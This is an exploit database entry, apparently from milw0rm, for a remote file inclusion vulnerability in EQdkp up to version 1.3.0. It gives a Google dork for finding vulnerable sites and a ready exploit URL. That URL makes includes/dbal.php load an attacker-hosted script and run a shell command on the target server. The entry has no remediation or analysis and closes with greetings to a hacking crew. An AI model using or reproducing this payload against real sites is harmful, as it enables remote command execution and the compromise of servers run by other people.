EQdkp 1.3.0 - 'dbal.php' Remote File Inclusion

EDB-ID:

1764

Author:

OLiBekaS

Type:

webapps

Platform:

PHP

Published:

2006-05-07

Title: EQdkp <= 1.3.0 Remote File Inclusion
URL: http://www.eqdkp.com/
Dork: "powered by EQdkp"
Author: OLiBekaS
greetz: Skulmatic, weleh, brockencode, and all #papmahackerlink crew

Exploit: /includes/dbal.php?eqdkp_root_path=http://yourhost/cmd.gif?cmd=ls

# milw0rm.com [2006-05-07]